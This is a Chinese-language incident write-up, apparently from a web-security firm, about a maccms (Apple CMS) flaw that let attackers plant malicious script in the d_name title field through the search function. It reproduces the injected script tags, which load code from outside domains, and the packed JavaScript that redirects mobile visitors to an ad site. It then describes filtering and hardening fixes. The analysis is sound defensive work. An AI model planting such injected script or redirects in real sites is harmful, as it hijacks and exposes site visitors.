蘋果CMS d_name值漏洞EXP掛馬的解決辦法是什么

今天就跟大家聊聊有關(guān)蘋果CMS d_name值漏洞EXP掛馬的解決辦法是什么，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

蘋果CMS漏洞是越來越多了，國(guó)內(nèi)很多電影網(wǎng)站都使用的是maccms V10 V8版本，就在2020年初該maccms漏洞爆發(fā)了，目前極少數(shù)的攻擊者掌握了該EXP POC，受該BUG的影響，百分之80的電影站都被攻擊了，很多電影站的站長(zhǎng)找到我們SINE安全來解決網(wǎng)站被掛馬的問題，通過分析我們發(fā)現(xiàn)大部分客戶網(wǎng)站在數(shù)據(jù)庫(kù)中都被插入了掛馬代碼，<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>，尤其電影片名d_name值被直接篡改，并且是批量掛馬，導(dǎo)致用戶打開網(wǎng)站訪問直接彈窗廣告并跳轉(zhuǎn)。

JS掛馬代碼如下：

eval(function(p,a,c,k,e,d){e=function(c){

return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};

if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];

e=function(){return'\\w+'};c=1;

};

while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;

}('4.5(\'<6 1="3/2"

7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script

|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));

var abcdefg=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphon

e|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;

if(abcdefg){setTimeout('window.location.href="https://m.zhuanjiyin.net:168/index.html?u=80666"',500)}

上面惡意代碼對(duì)訪問用戶進(jìn)行了判斷，如果是手機(jī)端的，IOS，安卓，以及平板都會(huì)跳轉(zhuǎn)到攻擊者設(shè)置好的廣告網(wǎng)頁(yè)當(dāng)中去，https://m.zhuanjiyin.net:168/index.html?u=80666就是跳轉(zhuǎn)到這里，根據(jù)我們SINE安全技術(shù)的分析與統(tǒng)計(jì)，大部分被攻擊的網(wǎng)站跳轉(zhuǎn)都是168端口的網(wǎng)址上，域名經(jīng)常變換，但是168端口沒有變，可以看出是同一個(gè)攻擊者所為。

電影網(wǎng)站被掛馬的特征就是以上這些情況，根據(jù)客戶的反饋以及提供服務(wù)器IP，root賬號(hào)密碼后，我們進(jìn)去對(duì)蘋果cms的源代碼進(jìn)行了全面的人工安全審計(jì)，在網(wǎng)站的根目錄下生成了webshell網(wǎng)站木馬后門文件，在緩存目錄中也發(fā)現(xiàn)了同樣的網(wǎng)站木馬，繼續(xù)溯源追蹤，查看nginx網(wǎng)站日志，發(fā)現(xiàn)用的是同樣的手段，我們SINE安全技術(shù)再熟悉不過了，通過post index.php搜索功能進(jìn)行插入數(shù)據(jù)庫(kù)并嵌入掛馬代碼，漏洞產(chǎn)生的原因是電影搜索里可以插入惡意代碼，攻擊者將惡意代碼加密后，不管你服務(wù)器用云鎖，還是寶塔，安全狗，都是攔截不了的，還是會(huì)被篡改。

我們SINE安全技術(shù)隨即對(duì)客戶的蘋果CMS漏洞進(jìn)行了修復(fù)，對(duì)POST過來的數(shù)據(jù)進(jìn)行了嚴(yán)格的安全過濾與檢測(cè)，對(duì)攻擊者加密的代碼也進(jìn)行了特征定位攔截。只要包含了該惡意內(nèi)容，直接攔截并返回錯(cuò)誤提示。對(duì)網(wǎng)站根目錄下存在的webshell也進(jìn)行了刪除。對(duì)客戶網(wǎng)站的緩存目錄，以及圖片目錄，JS目錄都做了安全部署與加固，防止php腳本文件在網(wǎng)站的運(yùn)行，對(duì)網(wǎng)站的管理員后臺(tái)進(jìn)行了權(quán)限分離，更新采集，與網(wǎng)站前端訪問使用2個(gè)數(shù)據(jù)庫(kù)賬號(hào)，1個(gè)只讀權(quán)限的數(shù)據(jù)庫(kù)賬號(hào)，1個(gè)后臺(tái)采集可寫的數(shù)據(jù)庫(kù)賬號(hào)，這在安全層面上來說，網(wǎng)站安全等級(jí)更高了，一般攻擊者無(wú)法攻擊與篡改。我們即修復(fù)了漏洞，也做了安全攔截與多層次的安全加固部署，至此客戶網(wǎng)站數(shù)據(jù)庫(kù)被掛馬的問題得以解決。

有很多客戶的電影網(wǎng)站都到maccms官方進(jìn)行了更新與補(bǔ)丁下載，但安裝后還是會(huì)繼續(xù)被掛馬，這里跟大家說一下，目前官方的漏洞補(bǔ)丁對(duì)此次數(shù)據(jù)庫(kù)掛馬漏洞是沒有任何效果的。如果不知道如何對(duì)蘋果cms漏洞進(jìn)行修復(fù)以及打補(bǔ)丁，建議找專業(yè)的網(wǎng)站安全公司來處理，對(duì)index.php搜索功能這里做安全過濾與攔截，對(duì)加密的特征碼進(jìn)行解密定位，更新到攔截黑名單中，即可修復(fù)該蘋果CMS漏洞。

看完上述內(nèi)容，你們對(duì)蘋果CMS d_name值漏洞EXP掛馬的解決辦法是什么有進(jìn)一步的了解嗎？如果還想了解更多知識(shí)或者相關(guān)內(nèi)容，請(qǐng)關(guān)注億速云行業(yè)資訊頻道，感謝大家的支持。